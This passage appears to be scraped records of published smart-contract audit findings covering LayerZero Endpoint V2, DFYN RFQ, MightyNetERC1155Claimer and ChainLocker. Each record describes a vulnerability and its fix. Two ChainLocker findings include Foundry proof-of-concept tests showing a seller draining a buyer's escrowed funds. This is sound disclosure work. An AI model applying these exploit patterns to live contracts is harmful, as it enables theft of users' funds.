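// Hypothetical sketch of the recommendation: track whether a DVN actually
// submitted, so the default value of an empty slot is never treated as valid.
struct Verification {
    bool submitted;        // set to true when the DVN signs
    uint64 confirmations;  // confirmations the DVN signed for
}

mapping(bytes32 => mapping(bytes32 => mapping(address => Verification))) internal hashLookup;

function _verified(
    address _dvn,
    bytes32 _headerHash,
    bytes32 _payloadHash,
    uint64 _requiredConfirmation
) internal returns (bool verified) {
    Verification memory v = hashLookup[_headerHash][_payloadHash][_dvn];
    // an unsubmitted slot fails even when _requiredConfirmation == 0
    verified = v.submitted && v.confirmations >= _requiredConfirmation;
    delete hashLookup[_headerHash][_payloadHash][_dvn];
}
```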
Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" + }, + { + "title": "4.2 Overlapping DVNs may lead to unverifable messages", + "labels": [ + "Zellic" + ], + "body": "Target: ReceiveUlnBase Category: Coding Mistakes Likelihood: Low Severity: Medium : Low To optimize for gas refunds, confirmations are deleted from hashLookup after being read. function _verified( address _dvn, bytes32 _headerHash, bytes32 _payloadHash, uint64 _requiredConfirmation ) internal returns (bool verified) { uint64 confirmations = hashLookup[_headerHash][_payloadHash][_dvn]; /) return true if the dvn has signed enough confirmations verified = confirmations >) _requiredConfirmation; delete hashLookup[_headerHash][_payloadHash][_dvn]; } In the scenario where a DVN is part both the required DVNs and optional DVNs, the confirmations from the DVN will be falsely deleted before they\u2019re read. This will cause the DVNs confirmation to not count as part of the optional DVN threshold. Messages that should\u2019ve been verifiable are falsely not verified. We would recommend deleting the confirmations after the optional DVN lookup. This issue has been acknowledged by LayerZero Labs, and a fix was implemented in commit 03244a85. Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" + }, + { + "title": "4.3 Potential reentrancy in lzReceive function", + "labels": [ + "Zellic" + ], + "body": "Target: EndpointV2 Category: Coding Mistakes Likelihood: Low Severity: Low : Low The lzReceive function deletes the payload hash prior to executing a delivered mes- sage to the receiver, thereby mitigating the risk of a reentrancy attack. In instances where message delivery fails, the hash is reinstated for resending. Subsequently, an external call is made to refund the native fee to the caller. function lzReceive( Origin calldata _origin, address _receiver, bytes32 _guid, bytes calldata _message, bytes calldata _extraData ) external payable returns (bool success, bytes memory reason) { /) clear the payload first to prevent reentrancy, and then execute the message bytes32 payloadHash = _clearPayload(_origin, _receiver, abi.encodePacked(_guid, _message)); (success, reason) = _safeCallLzReceive(_origin, _receiver, _guid, _message, _extraData); if (success) { emit PacketReceived(_origin, _receiver); } else { /) if the message fails, revert the clearing of the payload _inbound(_origin, _receiver, payloadHash); /) refund the native fee if the message fails to prevent the loss of fund if (msg.value > 0) { (bool sent, ) = msg.sender.call{value: msg.value}(\u201d\u201d); require(sent, Errors.INVALID_STATE); } emit LzReceiveFailed(_origin, _receiver, reason); } Zellic LayerZero Labs } During this second external call, the caller may reenter and execute the message cor- rectly, as the payloadHash has been restored prior to this call. Initially, the PacketReceived event will be emitted following successful execution. However, the LzReceiveFailed event will also be emitted for the same packet within the same transaction, but in an incorrect order. 
Restore the hash after the external call: function lzReceive( Origin calldata _origin, address _receiver, bytes32 _guid, bytes calldata _message, bytes calldata _extraData ) external payable returns (bool success, bytes memory reason) { /) clear the payload first to prevent reentrancy, and then execute the message bytes32 payloadHash = _clearPayload(_origin, _receiver, abi.encodePacked(_guid, _message)); (success, reason) = _safeCallLzReceive(_origin, _receiver, _guid, _message, _extraData); if (success) { emit PacketReceived(_origin, _receiver); } else { /) if the message fails, revert the clearing of the payload _inbound(_origin, _receiver, payloadHash); /) refund the native fee if the message fails to prevent the loss of fund if (msg.value > 0) { (bool sent, ) = msg.sender.call{value: msg.value}(\u201d\u201d); require(sent, Errors.INVALID_STATE); } Zellic LayerZero Labs /) if the message fails, revert the clearing of the payload _inbound(_origin, _receiver, payloadHash); emit LzReceiveFailed(_origin, _receiver, reason); } } This issue has been acknowledged by LayerZero Labs, and a fix was implemented in commit 6ce8d31c. Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" + }, + { + "title": "4.4 Potential reentrancy in lzCompose function", + "labels": [ + "Zellic" + ], + "body": "Target: MessagingComposer Category: Coding Mistakes Likelihood: Low Severity: Low : Low The lzCompose function deletes the composed message hash prior to executing a mes- sage to the composer, thereby mitigating the risk of a reentrancy attack. In instances where message delivery fails, the hash is reinstated for resending. Subsequently, an external call is made to refund the native fee to the caller. function lzCompose( address _sender, address _composer, bytes32 _guid, bytes calldata _message, bytes calldata _extraData ) external payable returns (bool success, bytes memory reason) { ...)) composedMessages[_sender][_composer][_guid] = _RECEIVED_MESSAGE_HASH; { bytes memory callData = abi.encodeWithSelector( ILayerZeroComposer.lzCompose.selector, _sender, _guid, _message, msg.sender, _extraData ); (success, reason) = _composer.safeCall(gasleft(), msg.value, callData); } if (success) { emit ComposedMessageReceived(_sender, _composer, _guid, expectedHash, msg.sender); } else { /) if the message fails, revert the state composedMessages[_sender][_composer][_guid] = expectedHash; Zellic LayerZero Labs /) refund the native fee if the message fails to prevent the loss of fund if (msg.value > 0) { (bool sent, ) = msg.sender.call{value: msg.value}(\u201d\u201d); require(sent, Errors.INVALID_STATE); } emit LzComposeFailed(_sender, _composer, _guid, expectedHash, msg.sender, reason); } } } During this second external call, the caller may reenter and execute the message cor- rectly, as the composedMessages has been restored prior to this call. Initially, the ComposedMessageReceived event will be emitted following successful exe- cution. However, the LzComposeFailed event will also be emitted for the same packet within the same transaction, but in an incorrect order. 
Restore the hash after the external call: function lzCompose( address _sender, address _composer, bytes32 _guid, bytes calldata _message, bytes calldata _extraData ) external payable returns (bool success, bytes memory reason) { ...)) composedMessages[_sender][_composer][_guid] = _RECEIVED_MESSAGE_HASH; ...)) if (success) { emit ComposedMessageReceived(_sender, _composer, _guid, expectedHash, msg.sender); } else { /) if the message fails, revert the state Zellic LayerZero Labs composedMessages[_sender][_composer][_guid] = expectedHash; /) refund the native fee if the message fails to prevent the loss of fund if (msg.value > 0) { (bool sent, ) = msg.sender.call{value: msg.value}(\u201d\u201d); require(sent, Errors.INVALID_STATE); } /) if the message fails, revert the state composedMessages[_sender][_composer][_guid] = expectedHash; emit LzComposeFailed(_sender, _composer, _guid, expectedHash, msg.sender, reason); } } } This issue has been acknowledged by LayerZero Labs, and a fix was implemented in commit 6ce8d31c. Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" + }, + { + "title": "4.5 Potential replay across chains", + "labels": [ + "Zellic" + ], + "body": "Target: VerifierNetwork Category: Business Logic Likelihood: Low Severity: Low : Low As LayerZero is a cross-chain application, VerifierNetwork might be deployed across multiple chains. There exists a possibility of message replay if signers are shared be- tween multiple instances of VerifierNetwork. This is because there is no unique iden- tifier pinning the VerifierNetwork the message can be executed at. A message can be replayed between instances of VerifierNetwork if the signers/quo- rum is shared. As the signed message includes the target address, calls to onlySelf(orAdmin) func- tions cannot be replayed. Furthermore, calls to ULN functions such as verify would not be useful to an attacker as well. Add an identifier to VerifierNetwork that is checked as part of the signature. LayerZero labs acknowled the issue and has fixed it in commit 175c08bd Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" + }, + { + "title": "4.6 Re-execution of instructions is blocked if a signature verifi- cation failed", + "labels": [ + "Zellic" + ], + "body": "Target: VerifierNetwork Category: Business Logic Likelihood: Medium Severity: Medium : Medium The execute function is designed to process a sequence of instructions, executing them in the specified order. If any instruction fail during this process, the function will emit the ExecuteFailed event and proceed with the execution of the next instruc- tions. The usedHashes array is used to prevent reentrancy and replay attacks. If the hash of an instruction is identified as already used during the execution process, the HashAlreadyUsed event is emitted, and the function moves on to the next instruction. In cases where the hash is not previously marked as used, it will be marked and sig- nature verification will be conducted. Upon successful verification, an external call is initiated to execute it. But the execution of an instruction fails, usedHashes is reset, allowing for the possibility of re-execution. However, if signature validation fails, the instruction is still marked as used. Consequently, instructions that are marked as used but fail signature validation are blocked from being re-attempted for execution. 
function execute(ExecuteParam[] calldata _params) external onlyRole(ADMIN_ROLE) { for (uint i = 0; i < _params.length; ++i) { ExecuteParam calldata param = _params[i]; ... // 2. skip if hash used bool shouldCheckHash = _shouldCheckHash(bytes4(param.callData)); if (shouldCheckHash) { if (usedHashes[hash]) { emit HashAlreadyUsed(param, hash); continue; } else { usedHashes[hash] = true; // prevent reentry and replay attack } } // 3. check signatures if (verifySignatures(hash, param.signatures)) { // execute call data (bool success, bytes memory rtnData) = param.target.call(param.callData); if (!success) { if (shouldCheckHash) { usedHashes[hash] = false; emit ExecuteFailed(i, rtnData); } } } else { if (shouldCheckHash) { usedHashes[hash] = false; } emit VerifySignaturesFailed(i); } } } This issue has been acknowledged by LayerZero Labs, and a fix was implemented in commit 3bb3e16d. Zellic LayerZero Labs", "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" }, { "title": "4.7 SafeCall does not check that target is contract", "labels": [ "Zellic" ], "body": "Target: SafeCall Category: Business Logic Likelihood: Low Severity: Medium : Medium The function safeCall is used to call the _target contract with a specified gas limit and value, and it captures the return data. But at the same time, there is no verification that the address is really a contract. If the _target address is not a contract, the call will be successful although the function call has not actually been made. We recommend adding a check that ensures the _target has code. function safeCall( address _target, uint256 _gas, uint256 _value, bytes memory _calldata ) internal returns (bool, bytes memory) { uint size; assembly { size := extcodesize(_target) } if (size == 0) { return (false, bytes(string(\u201cno code!\u201d))); } // set up for assembly call uint256 _toCopy; bool _success; ... } This issue has been acknowledged by LayerZero Labs, and a fix was implemented in commit 0d04db22. Zellic LayerZero Labs", "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" }, { "title": "4.8 Potential reentrancy through execute function", "labels": [ "Zellic" ], "body": "Target: VerifierNetwork Category: Coding Mistakes Likelihood: Medium Severity: Low : Low The execute function takes an array of ExecuteParam. For each of the parameters, it verifies the signatures, executes the callData, and stores its hash (if the call is successful) to prevent replay: // 2. skip if hash used bool shouldCheckHash = _shouldCheckHash(bytes4(param.callData)); if (shouldCheckHash && usedHashes[hash]) { emit HashAlreadyUsed(param, hash); continue; } // 3. check signatures if (verifySignatures(hash, param.signatures)) { // execute call data (bool success, bytes memory rtnData) = param.target.call(param.callData); if (success) { if (shouldCheckHash) { // store usedHash only on success usedHashes[hash] = true; // prevent reentry and replay attack } } else { emit ExecuteFailed(i, rtnData); } } The call can be made more than once for one signature if the execute function reenters during the external call, since the hash is not stored before the external call. Though unlikely to be exploited, there is the potential for unexpected behavior because the function does not sufficiently prevent reentrancy attacks.
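To make the reentrancy window concrete, the purely hypothetical target contract below re-enters execute() while usedHashes[hash] is still false; in practice the re-entering caller would also need ADMIN_ROLE (see finding 4.11), which is part of why the likelihood is limited. The struct layout and interface here are assumptions for illustration only:

```solidity
// Illustrative only: a param.target whose fallback re-enters execute() with
// the same signed batch before usedHashes[hash] is written on success.
struct ExecuteParam {
    address target;   // assumed field order; matches the fields used above
    bytes callData;
    uint256 expiration;
    bytes signatures;
}

interface IVerifierNetwork {
    function execute(ExecuteParam[] calldata _params) external;
}

contract ReentrantTarget {
    IVerifierNetwork public immutable network;
    ExecuteParam[] internal cached; // the same batch, stored before the first call

    constructor(IVerifierNetwork _network) {
        network = _network;
    }

    // store the signed batch ahead of time
    function cache(ExecuteParam[] calldata _params) external {
        for (uint256 i = 0; i < _params.length; ++i) {
            cached.push(_params[i]);
        }
    }

    fallback() external {
        // runs during param.target.call(...), while the hash is still unused
        network.execute(cached);
    }
}
```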
Store the hash before the external call: // 2. skip if hash used bool shouldCheckHash = _shouldCheckHash(bytes4(param.callData)); if (shouldCheckHash && usedHashes[hash]) { emit HashAlreadyUsed(param, hash); continue; } // 3. check signatures if (verifySignatures(hash, param.signatures)) { usedHashes[hash] = shouldCheckHash; // prevent reentry and replay // execute call data (bool success, bytes memory rtnData) = param.target.call(param.callData); if (success) { if (shouldCheckHash) { // store usedHash only on success usedHashes[hash] = true; // prevent reentry and replay attack } } else { if (!success) { delete usedHashes[hash]; emit ExecuteFailed(i, rtnData); } } This issue has been acknowledged by LayerZero Labs. Zellic LayerZero Labs", "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" }, { "title": "4.9 UlnConfig inconsistencies", "labels": [ "Zellic" ], "body": "Target: UlnConfig Category: Coding Mistakes Likelihood: Low Severity: Medium : Low There are a few inconsistencies in the UlnConfig code: For CONFIG_TYPE_VERIFIERS and CONFIG_TYPE_OPTIONAL_VERIFIERS, the config-setting code should only do assertions and assignments if !useCustomVerifiers or !useCustomOptionalVerifiers, respectively; otherwise, there are odd situations where, for example, a specific custom verifiers config cannot be set because UlnConfig thinks the custom optional verifiers will be used in the config, when in reality useCustomOptionalVerifiers is false. The _assertNoDuplicates function would be more useful if it would also assert no collisions between verifiers and optional verifiers (i.e., that there is no intersection). More importantly, there is also a situation where there could be zero \u2014 or greater than the max uint8 \u2014 (required and optional) verifiers configured: \u2013 config.useCustomVerifiers = true \u2013 config.verifierCount = 0 \u2013 config.optionalVerifierThreshold = 1 \u2013 config.useCustomOptionalVerifiers = false \u2013 defaultConfig.optionalVerifierCount = 0 \u2013 other specific values required to set the above config This is due to the following code: function _assertVerifierList(uint32 _remoteEid, address _oapp) internal view { UlnConfigStruct memory config = getUlnConfig(_oapp, _remoteEid); // it is possible for sender to configure nil verifiers require(config.verifierCount > 0 || config.optionalVerifierThreshold > 0, Errors.VERIFIERS_UNAVAILABLE); // verifier options restricts total verifiers to 255 require(config.verifierCount + config.optionalVerifierCount <= type(uint8).max, Errors.INVALID_SIZE); } It is possible to set invalid configuration in certain edge cases that may allow a message to pass with no confirmations. This situation is only achievable if both the admin and OApp independently configure specific values as the OApp and default configurations. Enforce function requirements during the getUlnConfig call. Then, call getUlnConfig() after changing any configurations. This issue has been acknowledged by LayerZero Labs, and a fix was implemented in commit 3dfec105.
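One way to implement the recommendation for finding 4.9 is to resolve the effective configuration and re-run the _assertVerifierList invariants whenever a configuration changes. The sketch below is illustrative only; the setter name and the ulnConfigs storage mapping are assumptions:

```solidity
// Hypothetical setter that validates the *resolved* config immediately,
// instead of deferring the checks to verification time.
function _setUlnConfig(uint32 _remoteEid, address _oapp, UlnConfigStruct memory _config) internal {
    ulnConfigs[_oapp][_remoteEid] = _config; // assumed storage layout
    // resolve custom + default values the same way getUlnConfig does
    UlnConfigStruct memory resolved = getUlnConfig(_oapp, _remoteEid);
    require(resolved.verifierCount > 0 || resolved.optionalVerifierThreshold > 0, Errors.VERIFIERS_UNAVAILABLE);
    require(resolved.verifierCount + resolved.optionalVerifierCount <= type(uint8).max, Errors.INVALID_SIZE);
}
```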
Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" + }, + { + "title": "4.10 Signature verification ecrecover is missing error condition check", + "labels": [ + "Zellic" + ], + "body": "Target: MultiSig, MultiSigUpgradeable Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The ecrecover call in the following function recovers the signer adress from the sig- nature components: function verifySignatures(bytes32 _hash, bytes calldata _signatures) public view returns (bool) { if (_signatures.length !) uint(quorum) * 65) { return false; } bytes32 messageDigest = _getEthSignedMessageHash(_hash); address lastSigner = address(0); /) There cannot be a signer with address 0. for (uint i = 0; i < quorum; i+)) { (uint8 v, bytes32 r, bytes32 s) = _splitSignature(_signatures, i); address currentSigner = ecrecover(messageDigest, v, r, s); if (currentSigner <) lastSigner) return false; /) prevent duplicate signatures if (!signers[currentSigner]) return false; /) signature is not from a signer lastSigner = currentSigner; } return true; } Per the Solidity documentation, the ecrecover built-in function returns zero on error: ... recover the address associated with the public key from elliptic curve signature or return zero on error. Zellic LayerZero Labs The duplicate signer check ensures zero is not a valid signer address. However, the error condition is not explicitly checked. We recommend checking the return value to ensure it is nonzero. /) [...))] address lastSigner = address(0); /) There cannot be a signer with address 0. for (uint i = 0; i < quorum; i+)) { (uint8 v, bytes32 r, bytes32 s) = _splitSignature(_signatures, i); address currentSigner = ecrecover(messageDigest, v, r, s); require(currentSigner !) 0); if (currentSigner <) lastSigner) return false; /) prevent duplicate signatures if (!signers[currentSigner]) return false; /) signature is not from a signer lastSigner = currentSigner; } /) [...))] This issue has been acknowledged by LayerZero Labs. Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" + }, + { + "title": "4.11 Unnecessary caller restriction on execute function", + "labels": [ + "Zellic" + ], + "body": "Target: VerifierNetwork Category: Business Logic Likelihood: Low Severity: Medium : Low The execute function restricts the caller to those with the admin role only: function execute(ExecuteParam[] calldata _params) external onlyRole(ADMIN_ROLE) { for (uint i = 0; i < _params.length; +)i) { ExecuteParam calldata param = _params[i]; /) 1. skip if expired if (param.expiration <) block.timestamp) { continue; } /) generate and validate hash bytes32 hash = hashCallData(param.target, param.callData, param.expiration); /) 2. skip if hash used bool shouldCheckHash = _shouldCheckHash(bytes4(param.callData)); if (shouldCheckHash &) usedHashes[hash]) { emit HashAlreadyUsed(param, hash); continue; } /) 3. check signatures if (verifySignatures(hash, param.signatures)) { /) execute call data (bool success, bytes memory rtnData) = param.target.call(param.callData); if (success) { if (shouldCheckHash) { /) store usedHash only on success usedHashes[hash] = true; /) prevent reentry and replay attack } } else { emit ExecuteFailed(i, rtnData); } Zellic LayerZero Labs } } } However, this restriction is unnecessary because the function requires a quorum of valid signatures. 
If an admin were to fail to call the execute function for any reason, the ULN would not deliver any messages to the endpoint, even if all of the signers were online. The function should be able to be called permissionlessly to ensure the signatures may always be submitted. This issue has been acknowledged by LayerZero Labs. Zellic LayerZero Labs", "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" }, { "title": "3.1 Same token swap is allowed", "labels": [ "Zellic" ], "body": "Target: DfynRFQ Category: Business Logic Likelihood: Medium Severity: Low : Low A user might mistakenly perform a same-token swap via the protocol, since there are no restrictions against that. In the function _swap(), there are no checks whatsoever for whether tokens[0] and tokens[1] are identical. function _swap( address custodian, address[] calldata tokens, uint256[] calldata amounts, uint64 deadline, bytes calldata signature ) internal onlyWhitelisted(custodian) returns (bool) { Swap memory swap = Swap({ user: msg.sender, custodian: custodian, token0: tokens[0], token1: tokens[1], amount0: amounts[0], amount1: amounts[1], deadline: deadline, nonce: nonces[msg.sender], chainId: chainId }); require(block.timestamp < swap.deadline, \u201cExpired Order\u201d); require(verify(swap, signature), \u201cInvalid Signer\u201d); require(swap.amount1 > 0 && swap.amount0 > 0, \u201camount != 0\u201d); This can lead to loss of the gas cost used in the transaction, as well as the tokens lost to protocol fees, all due to an undesirable action performed by the user in the first place. We recommend adding an additional check when performing a swap, such that the tokens on either side of the swap are not the same. function _swap( address custodian, address[] calldata tokens, uint256[] calldata amounts, uint64 deadline, bytes calldata signature ) internal onlyWhitelisted(custodian) returns (bool) { require(tokens[0] != tokens[1], \u201cSame token swap is disallowed\u201d); Swap memory swap = Swap({ user: msg.sender, custodian: custodian, token0: tokens[0], token1: tokens[1], amount0: amounts[0], amount1: amounts[1], deadline: deadline, nonce: nonces[msg.sender], chainId: chainId }); require(block.timestamp < swap.deadline, \u201cExpired Order\u201d); require(verify(swap, signature), \u201cInvalid Signer\u201d); require(swap.amount1 > 0 && swap.amount0 > 0, \u201camount != 0\u201d); This issue has been acknowledged by the Router team and mitigated in commit 3be1183.
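A regression test in the style of the Foundry tests elsewhere in this document could pin the new check down. The sketch below is hedged: only the internal _swap is shown above, so the external entry point rfq.swap and the fixtures (testToken, custodian, deadline, signature) are assumptions, not the project's actual API:

```solidity
// Hypothetical Foundry test: a same-token order must revert after the fix.
function test_sameTokenSwapReverts() public {
    address[] memory tokens = new address[](2);
    tokens[0] = address(testToken);
    tokens[1] = address(testToken); // identical token on both legs
    uint256[] memory amounts = new uint256[](2);
    amounts[0] = 1 ether;
    amounts[1] = 1 ether;
    vm.expectRevert(bytes("Same token swap is disallowed"));
    rfq.swap(custodian, tokens, amounts, deadline, signature); // assumed external wrapper around _swap
}
```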
Zellic Router Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/DFYN RFQ - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Risk of unintended token minting", + "labels": [ + "Zellic" + ], + "body": "Target: MightyNetERC1155Claimer Category: Business Logic Likelihood: Medium Severity: High : High The leaf nodes of the Merkle tree contain only the user addresses and do not include the tokenId or the address of mnERC1155 to be minted. As a result, a user can potentially use a Merkle proof expected for minting tokens with tokenId x to mint tokens with t okenId y, or even mint tokens on an entirely different mnERC1155 contract. Here is an example. In this scenario, we will consider tokenId y to be more valuable than tokenId x, and the claimWhitelist array contains a Merkle root where the user is eligible to mint n number of tokens with tokenId x. The potential issue arises from the fact that even though it might be expected for the user to call claim using the correct Merkle proof to mint their x tokens, they might choose not to do so and instead wait for the admin to change the tokenId using the function setTokenId. If the admin later changes the tokenId from x to y, the user can now simply call claim to claim n number of y tokens instead of x tokens. This behavior could lead to unintended economic consequences, as the user could take advantage of the situation to obtain more valuable y tokens rather than the orig- inally intended x tokens. If either setTokenId or setMightyNetERC1155Address is called to change the tokenId or m nERC1155 address before all the tokens are claimed, and the claimWhitelist is not fully cleared out, it could potentially result in the minting of different tokens than originally expected. To address this issue, it is recommended to ensure that claimWhitelist is completely cleared out before invoking setTokenId or setMightyNetERC1155Address. By doing so, any potential misuse of old Merkle proofs to mint new tokens can be prevented. Al- ternatively, you can consider including the tokenId and the address of ERC-1155 in the Zellic Mighty Bear Games Merkle trees, which can also help mitigate the problem. This issue has been acknowledged by Mighty Bear Games. Mighty Bear Games provided the following response: We acknowledge the concerns related to the possibility of unintended token minting. However, it\u2019s important to note that this contract is designed for a spe- cific use case, where only one item from one collection can be claimed. We assure you that we will not reuse the same contract for multiple claim or mint events. Instead, for each new event, a fresh contract will be deployed. The reason for implementing the SetTokenId function is to maximize flexibility in case we encounter any misconfigurations or issues after deployment. Should any problems arise, we will be able to pause the contract, make the necessary adjustments, and then resume its functionality. Zellic Mighty Bear Games", + "html_url": "https://github.com/Zellic/publications/blob/master/MightyNetERC1155Claimer - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Possible DOS while claiming ERC-1155", + "labels": [ + "Zellic" + ], + "body": "Target: MightyNetERC1155Claimer Category: Business Logic Likelihood: Medium Severity: Medium : Medium The claimWhitelist array stores the MerkleProofWhitelist struct containing the root hash of the Merkle tree. 
Each element in the array corresponds to a specific number of claimable tokens, and the Merkle tree contains addresses eligible to mint that number of tokens. If this array is large enough, users that have a large number of claimable tokens would need to spend too much gas to claim their tokens, or the claim function might entirely revert for them due to exceeding the gas limit, as the code loops through the dynamic array. function claim(bytes32[] calldata merkleProof) { ... uint256 size = claimWhitelist.length; bool whitelisted = false; uint256 toMint = 0; for (; toMint < size; ++toMint) { if (claimWhitelist[toMint].isWhitelisted(msg.sender, merkleProof)) { whitelisted = true; break; } } ... } The transaction might fail if the claimWhitelist array becomes too large and the gas exceeds the maximum gas limit. Additionally, users with a substantial number of claimable tokens would be required to spend a significant amount of gas to execute the transaction successfully. This gas consumption can become burdensome for users with a large number of tokens to claim. Consider modifying the claim function to accept the mint amount as an argument and use it directly to calculate the array index where isWhitelisted should be called. This adjustment can improve the efficiency of the function and avoid unnecessary iterations through the claimWhitelist array, especially in scenarios with a large number of claimable tokens. This issue has been acknowledged by Mighty Bear Games. Mighty Bear Games provided the following response: We have assessed the gas costs associated with claiming different amounts of ERC-1155 tokens, and our findings indicate that the increase in cost follows a linear pattern. We have taken this into consideration while designing the claiming process. Additionally, it is important to note that we have set a limit on the maximum number of tokens that can be claimed to just 3. Zellic Mighty Bear Games", "html_url": "https://github.com/Zellic/publications/blob/master/MightyNetERC1155Claimer - Zellic Audit Report.pdf" }, { "title": "3.1 Potential funds loss for buyers upon approval", "labels": [ "Zellic" ], "body": "Target: TokenLocker Category: Business Logic Likelihood: High Severity: Critical : Critical When depositing tokens into the TokenLocker contract, it is essential for the buyer to grant approval beforehand to the TokenLocker contract, a step necessary for invoking the depositTokens function. The function depositTokens takes in an address _depositor and transfers the tokens from this _depositor address to the TokenLocker contract. function depositTokens( address _depositor, uint256 _amount ) external nonReentrant { uint256 _balance = erc20.balanceOf(address(this)) + _amount; if (_balance > totalAmount) revert TokenLocker_BalanceExceedsTotalAmount(); if (!openOffer && _depositor !=
buyer) revert TokenLocker_NotBuyer(); if (erc20.allowance(_depositor, address(this)) < _amount) revert TokenLocker_AmountNotApprovedForTransferFrom(); if (expirationTime <) block.timestamp) revert TokenLocker_IsExpired(); if (_balance >) deposit &) !deposited) { /) if this TokenLocker is an open offer and was not yet accepted (thus '!deposited'), make depositing address the 'buyer' and update 'deposited' to true if (openOffer) { buyer = _depositor; emit TokenLocker_BuyerUpdated(_depositor); } deposited = true; emit TokenLocker_DepositInEscrow(_depositor); Zellic ChainLocker LLC } if (_balance =) totalAmount) emit TokenLocker_TotalAmountInEscrow(); emit TokenLocker_AmountReceived(_amount); amountDeposited[_depositor] += _amount; safeTransferFrom(tokenContract, _depositor, address(this), _amount); } This situation opens a potential vulnerability. Under certain circumstances, a seller could be enticed to exploit this loophole. They might opt to trigger the depositToke ns function using the buyer\u2019s address, assuming that the buyer had already granted approval to the TokenLocker contract. The vulnerability can be demonstrated using the following Foundry test code: function testtokenstealfrombuyer() public{ vm.label(buyer,\u201dbuyer\u201d); vm.label(seller,\u201dseller\u201d); testToken.mintToken(buyer, 20 ether); testToken.mintToken(seller, 1); console.log(\u201dBalance of buyer before attack\u201d,testToken.balanceOf(address(buyer))); console.log(\u201dBalance of seller before attack\u201d,testToken.balanceOf(address(seller))); openEscrowTest = new TokenLocker( true, true, 0, 0, 0, 10 ether, 20 ether, expirationTime, seller, buyer, testTokenAddr, address(0) ); Zellic ChainLocker LLC vm.prank(buyer); testToken.approve(address(openEscrowTest), 20 ether); vm.startPrank(seller); openEscrowTest.depositTokens(address(buyer),openEscrowTest.deposit() - 1); testToken.approve(address(openEscrowTest), 1); openEscrowTest.depositTokens(address(seller),1); openEscrowTest.depositTokens(address(buyer),openEscrowTest.totalAmount() - openEscrowTest.deposit()); vm.stopPrank(); vm.warp(block.timestamp + expirationTime); openEscrowTest.checkIfExpired(); console.log(\u201dBalance of buyer after attack\u201d,testToken.balanceOf(address(buyer))); console.log(\u201dBalance of seller after attack\u201d,testToken.balanceOf(address(seller))); } Sellers might be able to steal tokens from the buyers in case approval to the Token- Locker contract is provided. It is recommended to check if msg.sender is actually the _depositor in the depositTok ens call. ChainLocker LLC acknowledged this finding and implemented a fix in commit 8af9f1e6 Zellic ChainLocker LLC", + "html_url": "https://github.com/Zellic/publications/blob/master/ChainLocker - Zellic Audit Report.pdf" + }, + { + "title": "3.2 The function updateBuyer does not update the amountDepos ited mapping", + "labels": [ + "Zellic" + ], + "body": "Target: TokenLocker, EthLocker Category: Business Logic Likelihood: Medium Severity: Critical : High If the buyer global variable is set, the buyer can update the current buyer to a new address using the function updateBuyer. Updating the buyer using this function does not update the amountDeposited mapping. In case a buyer updates this address to a new buyer address, the seller could reject the old buyer using the rejectDepositor function to set the buyer to address(0) and deposited to false without returning any tokens. 
They can then deposit tokens in the locker themselves to become the new buyer and wait until expirationTime has passed to steal these tokens. The vulnerability can be demonstrated using the following Foundry test code: function teststealfrombuyer() public{ address buyer1 = vm.addr(0x1337); address buyer2 = vm.addr(0x1338); address seller1 = vm.addr(0x1339); vm.label(buyer1,\u201dbuyer1\u201d); vm.label(buyer2,\u201dbuyer2\u201d); vm.label(seller1,\u201dseller1\u201d); vm.deal(buyer1, 10 ether); vm.deal(seller1, 1 ether); console.log(\u201dBalance of seller before attack\u201d,seller1.balance); openEscrowTest = new EthLocker( true, true, 0, 0, 0, 10 ether, 20 ether, expirationTime, payable(seller1), buyer, Zellic ChainLocker LLC address(0) ); address payable _newContract = payable(address(openEscrowTest)); vm.startPrank(buyer1); (bool _success, ) = _newContract.call{value: 10 ether}(\u201d\u201d); openEscrowTest.updateBuyer(payable(buyer2)); vm.stopPrank(); vm.startPrank(seller1); openEscrowTest.rejectDepositor(payable(buyer2)); (_success, ) = _newContract.call{value: 1 ether}(\u201d\u201d); vm.warp(block.timestamp + expirationTime); openEscrowTest.checkIfExpired(); console.log(\u201dBalance of seller after attack\u201d,seller1.balance); } A seller can steal the tokens deposited by the buyers if the buyers update their address using the updateBuyer function. Correctly update the mapping amountDeposited by moving the value stored from the previous buyer to the new buyer. ChainLocker LLC acknowledged this finding and implemented a fix in commits 7d5c0a23 , 9ebb93f8 , 78339ea0 , 7aa15e05 , e18f2732 and 142300b6 Zellic ChainLocker LLC", + "html_url": "https://github.com/Zellic/publications/blob/master/ChainLocker - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Buyers can prevent themselves from being rejected", + "labels": [ + "Zellic" + ], + "body": "Target: TokenLocker, EthLocker Category: Business Logic Likelihood: High Severity: High : High Upon depositing funds into TokenLocker or EthLocker, the seller gains the ability to decline the depositor\u2019s request, leading to a refund of the deposited amount via the rejectDepositor function. This function internally triggers either safeTransferETH or safeTransfer, depending on whether it is being called from EthLocker or TokenLocker, respectively. In the case of EthLocker, an issue arises when safeTransferETH is called, as it would internally call the fallback function if a buyer is a contract; the buyer can purposefully call revert in the fallback function, causing the entire call to be reverted. Thus, a buyer can prevent themselves from being rejected by the seller. Following is the code of the rejectDepositor function: function rejectDepositor(address payable _depositor) external nonReentrant { if (msg.sender !) 
